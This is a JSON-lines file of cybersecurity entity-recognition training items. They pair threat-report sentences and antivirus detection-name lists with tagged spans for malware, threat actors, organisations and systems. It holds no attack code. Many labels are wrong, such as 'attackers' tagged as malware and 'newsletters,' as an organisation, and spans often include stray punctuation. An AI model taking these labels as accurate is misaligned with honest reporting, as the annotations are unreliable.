{"text": "A backdoor also known as: Trojan-Downloader.Win32.Axload!O TrojanDownloader.Axload Trojan/Downloader.Axload.o TROJ_FRAUDLOA.TT Win32.Trojan.WisdomEyes.16070401.9500.9998 W32/Downldr2.DOEJ TROJ_FRAUDLOA.TT Win.Downloader.66976-1 Trojan-Downloader.Win32.Axload.az Trojan.Win32.Axload.vqczl Trojan.Win32.Downloader.134456 TrojWare.Win32.Trojan.DNSChanger.~CRSE Trojan.DownLoader.59074 BehavesLike.Win32.Injector.ch W32/Downloader.HFNI-1674 TrojanDownloader.AxLoad.r SPR/Fake.C Trojan[Downloader]/Win32.Axload Troj.Downloader.W32.Axload.o!c Trojan-Downloader.Win32.Axload.az TrojanDownloader:Win32/Axload.A Trojan.BHORA.012841 Win32.Trojan-downloader.Axload.Dun Trojan.DL.Renos!Exa/gyOk4i0 Trojan-Downloader.Win32.Renos.AQ Win32/Trojan.Downloader.9f3", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003212", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Application.CoinMiner.S Trojan-Downloader.Win32.SetupFactory!O Trojan.Miner Application.CoinMiner.S Trojan.Win32.Z.Coinminer.938434 Troj.W32.Miner!c Application.CoinMiner.S Application.CoinMiner.S Tool.BtcMine.1149 W32/Trojan.FXQE-8469 Trojan/Win32.Vehidis Trojan:Win64/Stratumine.B Trojan.Vehidis Trj/CI.A Win32.Trojan.Miner.Alsn Win32/Trojan.Ransom.7fc", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003214", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Ransom.Cerber.FA Ransom/W32.Cerber.561843.B Ransom.Cerber.S363870 Trojan.Ransom.Cerber.FA Trojan.Ransom.Cerber.FA Win32.Trojan.Kryptik.bin Ransom_HPCERBER.SMALY5A Win.Ransomware.Cerber-5970079-0 Trojan.Ransom.Cerber.FA Trojan.Ransom.Cerber.FA Trojan.Win32.Kryptik.eljryo Trojan.Ransom.Cerber.FA Trojan.Encoder.7453 Trojan.Kryptik.Win32.998775 Ransom_HPCERBER.SMALY5A BehavesLike.Win32.Ransomware.hh Trojan-Ransom.Cerber Trojan.Zerber.amh TR/Crypt.ZPACK.mblws Trojan[Ransom]/Win32.Zerber Trojan.Menti Ransom.Cerber Trojan.Zerber! Win32/Trojan.e14", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003216", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9771 Win.Worm.VBMania-1 Win32.Trojan.Visal.A Trojan.Win32.Swisyn.ajwe TrojWare.Win32.VB.YNB Trojan.MulDrop6.48042 Trojan/Swisyn.kkp Worm:Win32/Visal.A Trojan.Win32.Swisyn.ajwe Virus.Win32.Vbinder", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003217", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Downloader.VB.Win32.85130 TrojanDownloader.VB Trojan-Downloader.Win32.VB.bkxc Trojan.DownLoader9.27791 TrojanDownloader.VB.dikm TrojanDownloader:Win32/Gurip.A Trojan.Heur.EE8DE0 Trojan-Downloader.Win32.VB.bkxc Trojan.Downloader.VB Trojan.DL.VB!q71Z8AF5llY", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003218", "source": "cyner2_train"}}
{"text": "The message was sent from an account created under her name on lesser known email provider 1 1's Mail.com, a common tactic in recent months, with a link to a file hosted on Dropbox and an additional credential phishing attempt.", "spans": {"SYSTEM: email provider": [[76, 90]], "ORGANIZATION: Dropbox": [[173, 180]], "THREAT_ACTOR: additional credential phishing": [[188, 218]]}, "info": {"id": "cyner2_train_003219", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.TaskmanMispD.Trojan Worm/W32.Vobfus.217088 Worm.Win32.Vobfus!O Worm.Raideloz.A3 W32/Autorun.worm.aaeh W32/Vobfus.ahox WORM_VOBFUS.SMJA Win32.Worm.Pronny.dn WORM_VOBFUS.SMJA Win.Worm.Vobfus-12049 Worm.Win32.WBNA.ipa Trojan.Win32.Vobfus.cinarv Worm.Win32.A.Vobfus.155648.F WIN.Troj.Vobfus.lEaX Worm.Win32.Vobfus.AJR Win32.HLLW.Autoruner1.29632 BehavesLike.Win32.VBObfus.dm Worm/Vobfus.mos Worm:Win32/Raideloz.A Trojan.Barys.DA54 Worm.Win32.WBNA.ipa Worm/Win32.Vobfus.R43029 Worm.Vobfus Worm.Win32.Raideloz W32/VBObfus.C!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003221", "source": "cyner2_train"}}
{"text": "This report expands the Mexican investigation and shows how 10 Mexican journalists and human rights defenders, one minor child, and one United States citizen, were targeted with NSO's Exploit Framework.", "spans": {"ORGANIZATION: the Mexican investigation": [[20, 45]], "ORGANIZATION: Mexican journalists": [[63, 82]], "ORGANIZATION: human rights defenders, one minor child,": [[87, 127]], "ORGANIZATION: one United States citizen,": [[132, 158]], "MALWARE: NSO's Exploit Framework.": [[178, 202]]}, "info": {"id": "cyner2_train_003223", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.KillAV Worm.Win32.Delf.ag Packed.Win32.Klone.~KE Trojan.DownLoader.origin Trojan-Downloader.Win32.Delf!IK Trojan-Downloader.Win32.Delf W32/PEMask.B!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003224", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Joke/W32.BadJoke.20500 Hoax.Vb Hoax.Win32.BadJoke.VB.d Riskware.Win32.Anywork.hrys Joke.Miracle Tool.BadJoke.Win32.176 BehavesLike.Win32.PUP.mz Hoax.Win32.BadJoke.VB Hoax.BadJoke.djv HackTool[Hoax]/Win32.VB Win32.Joke.WorkJoke.a.kcloud Hoax.Win32.BadJoke.VB.d Joke:Win32/Small.NAO Unwanted/Win32.Badjoke.R100207 BadJoke.Win32.VB.d Trojan.VBRA.02296 Win32.Trojan-psw.Badjoke.Plui", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003225", "source": "cyner2_train"}}
{"text": "Fake tax spam leads to malware:", "spans": {"MALWARE: malware:": [[23, 31]]}, "info": {"id": "cyner2_train_003226", "source": "cyner2_train"}}
{"text": "On April 7th 2017 Haifei Li published on the McAfee blog1 about a Critical Office Zero-Day in the wild.", "spans": {"ORGANIZATION: Haifei Li": [[18, 27]], "ORGANIZATION: McAfee": [[45, 51]], "VULNERABILITY: Critical Office Zero-Day": [[66, 90]]}, "info": {"id": "cyner2_train_003229", "source": "cyner2_train"}}
{"text": "Notice notice the use of the mistaken “ Word ” instead of “ World ” : “ On behalf of all at the Word Uyghur Congress ( WUC ) , the Unrepresented Nations and Peoples Organization ( UNPO ) and the Society for Threatened Peoples ( STP ) , Human Rights in China : Implications for East Turkestan , Tibet and Southern Mongolia In what was an unprecedented coming-together of leading Uyghur , Mongolian , Tibetan and Chinese activists , as well as other leading international experts , we were greatly humbled by the great enthusiasm , contribution and desire from all in attendance to make this occasion something meaningful , the outcome of which produced some concrete , action-orientated solutions to our shared grievances .", "spans": {"ORGANIZATION: Word Uyghur Congress ( WUC )": [[96, 124]], "ORGANIZATION: Unrepresented Nations and Peoples Organization ( UNPO )": [[131, 186]], "ORGANIZATION: Society for Threatened Peoples ( STP )": [[195, 233]]}, "info": {"id": "cyner2_train_003230", "source": "cyner2_train"}}
{"text": "In February 2017, we found a new Ebury sample, that introduces a significant number of new features.", "spans": {"MALWARE: Ebury": [[33, 38]]}, "info": {"id": "cyner2_train_003231", "source": "cyner2_train"}}
{"text": "We first discussed them in April 2015 when we witnessed them targeting a number of organizations in Japan.", "spans": {"ORGANIZATION: organizations": [[83, 96]]}, "info": {"id": "cyner2_train_003232", "source": "cyner2_train"}}
{"text": "It is important to note that Adobe has released the bulletin APSB15-27 to address this vulnerability; the latest version of Flash 19.0.0.226 is no longer vulnerable.", "spans": {"ORGANIZATION: Adobe": [[29, 34]], "VULNERABILITY: vulnerability;": [[87, 101]], "SYSTEM: Flash 19.0.0.226": [[124, 140]]}, "info": {"id": "cyner2_train_003233", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/Turla.aj BKDR_TAVDIG.ZGEJ-A Win32.Trojan.WisdomEyes.16070401.9500.9998 Trojan.Wipbot BKDR_TAVDIG.ZGEJ-A Troj.W32.Epiccosplay!c Win32.Backdoor.Wipbot.Ehhy BackDoor.Turla.52 Trojan.Turla.Win32.35 BehavesLike.Win32.Ramnit.cc Trojan.Win32.Turla BDS/WipBot.B.1 Trojan.Kazy.D6CC04 Backdoor:Win32/WipBot.B Trojan/Win32.Tavdig.C561133 Trojan.Turla!36kTMhU81bU", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003238", "source": "cyner2_train"}}
{"text": "This variation of the Trojan was also mentioned in the 2013 FireEye blogs about the Sunshop campaign 3 and operation ephemeral hydra 4.", "spans": {"MALWARE: Trojan": [[22, 28]], "ORGANIZATION: FireEye": [[60, 67]], "THREAT_ACTOR: Sunshop campaign": [[84, 100]], "THREAT_ACTOR: operation ephemeral hydra": [[107, 132]]}, "info": {"id": "cyner2_train_003240", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Downloader.JSLP Trojan.Downloader.JSLP Adware.AdPeak Trojan/Downloader.Rottentu.a Trojan.Downloader.JSLP Win32.Trojan.WisdomEyes.151026.9950.9980 Adware.Crossid Win32/Tnega.LUdScAC not-a-virus:AdWare.Win32.AdPeak.dn Adware.W32.Adpeak!c Trojan.Downloader.JSLP Trojan.Downloader.JSLP Trojan.DownLoader16.16196 backdoor.win32.prorat.ah BehavesLike.Win32.Downloader.tc AdWare/AdPeak.ab GrayWare[AdWare:not-a-virus]/Win32.AdPeak Trojan.Downloader.JSLP TrojanDownloader:Win32/Tordow.A Adware/Win32.AdPeak.N1435735988 AdWare.AdPeak Trojan.Downloader.JSLP", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003241", "source": "cyner2_train"}}
{"text": "There are several different Locky campaigns going on at the same time, the largest being the one from affiliate ID 3 which comes with malicious ZIP containing .VBS or .JS attachments.", "spans": {"THREAT_ACTOR: Locky campaigns": [[28, 43]]}, "info": {"id": "cyner2_train_003242", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Packed.Win32.TDSS!O RiskWare.Tool.CK Win32.Trojan.WisdomEyes.16070401.9500.9900 W32/PWStealerX.EGK TSPY_RAVEN.A Trojan-PSW.Win32.Raven.b Trojan.Win32.Raven.ewlguc TrojWare.Win32.Patched.KSU BackDoor.Uragan TSPY_RAVEN.A BehavesLike.Win32.Ransomware.nc W32/PWS.PQHC-6858 Trojan/PSW.Ravenpass.a PWS:Win32/Raven.C Trojan-PSW.Win32.Raven.b TrojanPSW.Raven Trojan.PWS.Raven!jl2h2OWvUG8 Trojan-Spy.Win32.Hsow", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003243", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Cendelf.A8 WS.Reputation.1 Delf.PVUB Win32/Tnega.CTAcCXD PE:Malware.Delf!6.F BackDoor.Bulknet.1078 TR/Spy.Browse.14364 Trojan/Win32.Cendelf Trojan-Dropper.Delf W32/Delff.RJH!tr Delf.ALTK", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003244", "source": "cyner2_train"}}
{"text": "Streamlining development makes financial sense for attackers, so the findings may imply a bigger trend towards industrialization that achieves an economy of scale.", "spans": {}, "info": {"id": "cyner2_train_003245", "source": "cyner2_train"}}
{"text": "It turned out that they are also atypical by many means.", "spans": {}, "info": {"id": "cyner2_train_003246", "source": "cyner2_train"}}
{"text": "We've identified 9,215 samples tagged Banload in AutoFocus since December 2013.", "spans": {"MALWARE: samples": [[23, 30]], "MALWARE: Banload": [[38, 45]], "SYSTEM: AutoFocus": [[49, 58]]}, "info": {"id": "cyner2_train_003247", "source": "cyner2_train"}}
{"text": "Talos has observed a small email campaign leveraging the use of Microsoft Publisher files.", "spans": {"THREAT_ACTOR: small email campaign": [[21, 41]]}, "info": {"id": "cyner2_train_003248", "source": "cyner2_train"}}
{"text": "This IOC contains indicators detailed in the whitepaper Hiding in Plain Sight: FireEye and Microsoft Expose Chinese APT Group's Obfuscation Tactic", "spans": {"ORGANIZATION: FireEye": [[79, 86]], "ORGANIZATION: Microsoft": [[91, 100]], "THREAT_ACTOR: Chinese APT Group's": [[108, 127]]}, "info": {"id": "cyner2_train_003252", "source": "cyner2_train"}}
{"text": "Stumbled upon another one of the FakeAV's, its called Internet Security", "spans": {"MALWARE: FakeAV's,": [[33, 42]], "MALWARE: Internet Security": [[54, 71]]}, "info": {"id": "cyner2_train_003253", "source": "cyner2_train"}}
{"text": "A backdoor also known as: TrojanPWS.Mauthy.g3 Win32.Trojan.WisdomEyes.151026.9950.9998 Heur.AdvML.C Trojan.Win32.DownLoader1.dklsld Trojan.Win32.Z.Kazy.1108582[h] Trojan.DownLoader4.60407 BehavesLike.Win32.SoftPulse.tc Trojan.Kazy.D103DE PWS:MSIL/Mauthy.A Trojan-PWS.MSIL PSW.ILUSpy Trj/CI.A Win32/Trojan.7d3", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003254", "source": "cyner2_train"}}
{"text": "These .pub files are normally used for the publishing of documents such as newsletters, allowing users to create such documents using familiar office functions such as mail merging.", "spans": {"ORGANIZATION: newsletters,": [[75, 87]], "ORGANIZATION: documents": [[118, 127]], "SYSTEM: mail merging.": [[168, 181]]}, "info": {"id": "cyner2_train_003256", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9869 BackDoor.BlackEnergy.80 Worm:Win32/Phdet.B", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003257", "source": "cyner2_train"}}
{"text": "By utilizing a completely fileless infection chain, the malware will be more difficult to analyze using a sandbox, making it more difficult for anti-malware engineers to examine.", "spans": {"MALWARE: fileless infection chain, the malware": [[26, 63]], "SYSTEM: sandbox,": [[106, 114]], "ORGANIZATION: anti-malware engineers": [[144, 166]]}, "info": {"id": "cyner2_train_003258", "source": "cyner2_train"}}
{"text": "In cooperation with WeipTech, we have identified 92 samples of a new iOS malware family in the wild.", "spans": {"ORGANIZATION: WeipTech,": [[20, 29]], "MALWARE: iOS malware family": [[69, 87]]}, "info": {"id": "cyner2_train_003259", "source": "cyner2_train"}}
{"text": "RetroTetris can be installed in Android versions starting from 2.3 Gingrebread while Brain Test can be installed in versions starting from 2.2 Froyo.", "spans": {"MALWARE: RetroTetris": [[0, 11]], "SYSTEM: Android versions": [[32, 48]], "SYSTEM: 2.3 Gingrebread": [[63, 78]], "MALWARE: Brain Test": [[85, 95]], "SYSTEM: 2.2 Froyo.": [[139, 149]]}, "info": {"id": "cyner2_train_003260", "source": "cyner2_train"}}
{"text": "] net/mms.apk to view the message ” Once the APK package is downloaded , potential victims are urged to grant the malicious app a wide range of permissions on their Android device : App permissions SEND_SMS RECEIVE_BOOT_COMPLETED INTERNET SYSTEM_ALERT_WINDOW WRITE_SMS ACCESS_NETWORK_STATE WAKE_LOCK GET_TASKS CALL_PHONE RECEIVE_SMS READ_PHONE_STATE READ_SMS ERASE_PHONE Once installed , MazarBOT downloads a copy of Tor onto users ’ Android smartphones and uses it to connect anonymously to the net before sending a text message containing the victim ’ s location to an Iranian mobile phone number .", "spans": {"MALWARE: MazarBOT": [[388, 396]], "SYSTEM: Tor": [[417, 420]], "SYSTEM: Android": [[434, 441]]}, "info": {"id": "cyner2_train_003262", "source": "cyner2_train"}}
{"text": "The malware mostly targets European users.", "spans": {"MALWARE: malware": [[4, 11]], "ORGANIZATION: European users.": [[27, 42]]}, "info": {"id": "cyner2_train_003263", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9988 Trojan.Win32.Geratid.dklqgw Trojan.Msil Backdoor:MSIL/Geratid.A!dll", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003264", "source": "cyner2_train"}}
{"text": "It was discovered in early 2014 and was named after a debug string, BlackMoon that was present in its code.", "spans": {"MALWARE: BlackMoon": [[68, 77]]}, "info": {"id": "cyner2_train_003268", "source": "cyner2_train"}}
{"text": "Volexity recently identified a breach to the website of a well regarded media outlet in the country of Georgia.", "spans": {"ORGANIZATION: Volexity": [[0, 8]]}, "info": {"id": "cyner2_train_003269", "source": "cyner2_train"}}
{"text": "From the latter half of May until June 10, there was a relative lull in TorrentLocker-related emails.", "spans": {}, "info": {"id": "cyner2_train_003270", "source": "cyner2_train"}}
{"text": "This technique is being used to allow the attackers to conceal their secondary payloads, bypassing different AV products.", "spans": {"MALWARE: attackers": [[42, 51]], "MALWARE: payloads,": [[79, 88]], "SYSTEM: AV": [[109, 111]]}, "info": {"id": "cyner2_train_003274", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.Nuclear Win32.Trojan.WisdomEyes.16070401.9500.9871 Trojan.Win32.Nuclear.baxsh Backdoor.Win32.Nuclear.182272 Backdoor.Win32.Nuclear.CU BackDoor.Nuclearat.452 Backdoor.Nuclear.Win32.1045 Backdoor.Win32.Nuclear Backdoor/Nuclear.yt Trojan[Backdoor]/Win32.Nuclear Backdoor.Nuclear Trojan.Zusy.Elzob.493 Win32/Nuclear.CU Backdoor.Nuclear!tPH0Q8Q37CQ", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003275", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Viking.GY TrojWare.Win32.Magania.~AD Trojan/Win32.Hupigon Trojan-PWS.Win32.Hangame.cl", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003276", "source": "cyner2_train"}}
{"text": "Most recently, we observed several relatively large email campaigns distributing the Kronos banking Trojan.", "spans": {"THREAT_ACTOR: email campaigns": [[52, 67]], "MALWARE: Kronos banking Trojan.": [[85, 107]]}, "info": {"id": "cyner2_train_003277", "source": "cyner2_train"}}
{"text": "This domain has been previously reported as an lSMAgent C2.", "spans": {}, "info": {"id": "cyner2_train_003278", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor/W32.CommInet.70741 Win32.Trojan.WisdomEyes.16070401.9500.9999 Backdoor.Exdis Trojan.Win32.Small.dqjffo MalCrypt.Indus! BackDoor.HangUp.44052 BehavesLike.Win32.Backdoor.kh Trojan[Backdoor]/Win32.CommInet Win32.Hack.Small.ak.kcloud Backdoor:Win32/Easydor.D Bck/CommInet.V Win32.Backdoor.Comminet.dbwh Backdoor.Win32.CommInet Exdis.A!tr.bdr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003280", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.RevengeRat.2 TROJ_REVETRAT.SM Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.Revetrat TROJ_REVETRAT.SM Win.Trojan.RevengeRat-6344273-0 BackDoor.RevetRat.2 BehavesLike.Win32.Trojan.lm W32/Trojan.VQKC-8396 Backdoor:MSIL/Revetrat.A!bit Backdoor.RevetRat Trj/GdSda.A Win32/Trojan.961", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003283", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/W32.StartPage.87040.B Trojan.Searmapxp.FC.384 Trojan.StartPage.MSIL Win32.Trojan.StartPage.ck Win.Trojan.Startpage-6834 Trojan.Win32.Startpage.fsfn Trojan.Win32.StartPage.dztahb Trojan.Win32.Z.Startpage.87040.FS Troj.W32.Startpage!c Win32.Trojan.Startpage.Szvb TrojWare.Win32.Startpage.KAX Trojan.Click3.12428 Trojan/StartPage.qbi Pua.Secure.Installer ADWARE/IERedirector.87040 Trojan/Win32.Startpage Trojan:Win32/Searmapxp.A!bit Trojan.Win32.Startpage.fsfn Adware/Win32.StartPage.R160955 Trojan.StartPage Trj/CI.A Trojan.Click!GCNxubkcTZg AdWare.IERedirector MSIL/StartPage.MI!tr Win32/Virus.Adware.007", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003285", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.VBOverlayD.PE Trojan.Win32.Swisyn!O Trojan.Mofksys.A W32/Swisyn.ag Trojan/Swisyn.bner PE_MOFKSYS.A W32.Gosys Win32/VB.BOP PE_MOFKSYS.A Win.Virus.Sality:1-6335700-1 Troj.W32.Swisyn.tnEM Trojan/Swisyn.rmj Trojan/Win32.Swisyn.bner Trojan.Win32.Swisyn.bner Trojan/Win32.Swisyn.R1452 Trojan.Swisyn Trojan.Win32.VB", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003287", "source": "cyner2_train"}}
{"text": "The targets of these attacks appear to primarily be companies in the video games industry, although other targets may exist outside of our telemetry.", "spans": {"ORGANIZATION: companies": [[52, 61]], "ORGANIZATION: video games industry,": [[69, 90]], "ORGANIZATION: telemetry.": [[139, 149]]}, "info": {"id": "cyner2_train_003288", "source": "cyner2_train"}}
{"text": "Unit 42 has observed a new version of Hworm or Houdini being used within multiple attacks.", "spans": {"ORGANIZATION: Unit 42": [[0, 7]], "MALWARE: Hworm": [[38, 43]], "MALWARE: Houdini": [[47, 54]]}, "info": {"id": "cyner2_train_003290", "source": "cyner2_train"}}
{"text": "A backdoor also known as: HEUR:Trojan.AndroidOS.Piom.dzu Trojan.Android.Piom.expmgs a.privacy.dingwe Android.Spy.422.origin ANDROID/Piom.otvgv Trojan/Android.Piom HEUR:Trojan.AndroidOS.Piom.dzu Trojan.AndroidOS.Spy.D Trojan.AndroidOS.Dingwe Android/Fyec.DZS!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003291", "source": "cyner2_train"}}
{"text": "Samples and command and control hosts associated with the Imminent Monitor RAT", "spans": {"SYSTEM: hosts": [[32, 37]], "MALWARE: Imminent Monitor RAT": [[58, 78]]}, "info": {"id": "cyner2_train_003292", "source": "cyner2_train"}}
{"text": "This strange behavior consisted of a large amount of peculiar files being written into sensitive system directories.", "spans": {}, "info": {"id": "cyner2_train_003294", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.CoinMinerSimY.Worm Trojan.Multi Backdoor.Graybird TROJ_COINMINE.THAOIO Trojan.Win32.Miner.tidx Trojan.Win32.Miner.exakqc Trojan.Win32.S.CoinMiner.1312256 Uds.Dangerousobject.Multi!c Trojan.BtcMine.2100 TROJ_COINMINE.THAOIO BehavesLike.Win32.MultiPlug.tc PUA.EnigmaProtector Trojan.Miner.axs W32.Miner.Smominru TR/Crypt.Xpack.vknzu Trojan.Win32.Miner.tidx Trojan:Win32/Smominru.A Unwanted/Win32.BitCoinMiner.C2352839 Misc.Riskware.MoneroMiner Trojan.Miner RiskWare.BitCoinMiner Trj/CI.A Win32/CoinMiner.ALB Win32.Trojan.Miner.Dxct W32/CoinMiner.ALB!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003296", "source": "cyner2_train"}}
{"text": "A backdoor also known as: TrojanClicker.MSIL Trojan.Win32.Clicker!BT TrojWare.MSIL.TrojanClicker.Lasdoma.NRJ Trojan.Click3.24925 Trojan.MSIL.TrojanClicker TrojanClicker.MSIL.mr TR/ATRAPS.hsvhb Trojan.Johnnie.DE2DE TrojanClicker:MSIL/Lasdoma.A!bit Win-Trojan/ADM01.Exp Trojan.Win32.Clicker!BT", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003299", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Pakes Trojan/Pakes.cxg Trojan.Heur.EAB04F Win32.Trojan.WisdomEyes.16070401.9500.9965 W32/Trojan2.BBCZ Win.Trojan.Pakes-1891 Trojan.Win32.Pakes.cxg Trojan.Win32.Pakes.buyldp Troj.W32.Pakes.cxg!c Trojan.DownLoader.61691 Trojan.Pakes.Win32.5440 BehavesLike.Win32.Dropper.lc Trojan.Win32.Crypt W32/Trojan.VJUA-2101 Trojan/Pakes.bvs Trojan/Win32.Pakes Win32.Troj.Unknown.kcloud Trojan.Win32.Pakes.cxg BScope.Trojan.MTA.01233 Trj/Pakes.EB Win32.Trojan.Pakes.Dygy Trojan.Pakes!elDwpuVaGqk", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003300", "source": "cyner2_train"}}
{"text": "W32.Futurax is a worm that spreads via removable drives and network shares.", "spans": {"MALWARE: worm": [[17, 21]], "SYSTEM: removable drives": [[39, 55]], "SYSTEM: network shares.": [[60, 75]]}, "info": {"id": "cyner2_train_003302", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win.Trojan.Dapato-413 Trojan.Win32.Dapato.bewyzt BackDoor.Cool.362 TR/Spy.289792.56 Win32.Troj.Undef.kcloud Dropper/Win32.Dapato Trojan-Downloader.win32.Delf.xoq Trojan-Dropper.Dapato.bauk Win32/Delf.OJW Trojan-Dropper.Win32.Dapato Delf.AJUR", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003303", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.eHeur.Virus02 Virus.Win32.Sality!O BehavesLike.Win32.BadFile.fc Trojan-Spy.Win32.AutoHK TR/Dldr.AutoHK.rguvg TrojanDownloader:MSIL/AutoHK.B!bit TrojanSpy.AutoHK Win32/TrojanDownloader.AutoHK.BC", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003305", "source": "cyner2_train"}}
{"text": "Pony will infect the victim computer and download an additional malware.", "spans": {"MALWARE: Pony": [[0, 4]], "SYSTEM: computer": [[28, 36]], "MALWARE: additional malware.": [[53, 72]]}, "info": {"id": "cyner2_train_003308", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Chekafe.A TROJ_DLOADR.SMOK Win32.Trojan.WisdomEyes.16070401.9500.9999 Win32/Donloz.AQU TROJ_DLOADR.SMOK Trojan.Win32.Downloader.14836 Trojan.DownLoad2.12418 BehavesLike.Win32.Backdoor.lm Trojan-Downloader.Win32.Chekafe Win32.TrojDownloader.tb.kcloud TrojanDownloader:Win32/Chekafe.C BScope.Trojan.SvcHorse.01643", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003312", "source": "cyner2_train"}}
{"text": "A backdoor also known as: HW32.Packed.4102 TrojWare.Win32.CoinMiner.IEGT W32/Trojan.QGMZ-7351 Trojan.Heur.FU.EE0BC8", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003313", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Virus.Win32.Sality!O W32/Trojan.HAUX-5531 Trojan.Win32.Fsysna.erxi Variant.Symmi.mCm9 BehavesLike.Win32.Downloader.tc Trojan/Blocker.idi TR/IRCBot.hjsna Trojan.Barys.DE0A3 Trojan.Win32.Z.Ircbot.1304576 Trojan.Win32.Fsysna.erxi Trojan:Win32/Fenibot.A Trojan/Win32.Inject.C860331 Win32/IRCBot.NIM Trojan.Kazy W32/IRCBot.NIM!tr Trj/CI.A Win32/Trojan.2d1", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003314", "source": "cyner2_train"}}
{"text": "A backdoor also known as: TrojanPWS.Fareit.FC.2719 Trojan.Zusy.D33BC8 Win32.Trojan.WisdomEyes.16070401.9500.9992 BehavesLike.Win32.Trojan.vc Trojan/Win32.Inject.C1663733 Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003317", "source": "cyner2_train"}}
{"text": "By pivoting off of the infrastructure we learned that it is related to Winnti, a Chinese threat actor that is mostly targeting the gaming industry.", "spans": {"SYSTEM: infrastructure": [[23, 37]], "THREAT_ACTOR: Winnti,": [[71, 78]], "THREAT_ACTOR: a Chinese threat actor": [[79, 101]], "ORGANIZATION: the gaming industry.": [[127, 147]]}, "info": {"id": "cyner2_train_003319", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.MyDoomI.Kr Win32/Mydoom.BT W32.Dozer Win32/Lyzapo.A WORM_MYDOOM.EA Win.Trojan.Dozer-1 Trojan.Dozer.1 WORM_MYDOOM.EA BehavesLike.Win32.Mydoom.fc W32/Backdoor.VQLJ-7986 Win32.Troj.Undef.kcloud TrojanDropper:Win32/Lyzapo.A Dropper/Win32.DDoS.N19798743 W32/Mydoom.cf Trojan.DR.Lyzapo!rpJ9Iphh7tw W32/Dozzer.A!tr W32/MyDoom.HN.worm", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003320", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Downloader Trojan.DownLoader6.50414 BehavesLike.Win32.Trojan.tm TR/Dldr.Megone.cwqt Trj/CI.A Win32/Trojan.9b4", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003323", "source": "cyner2_train"}}
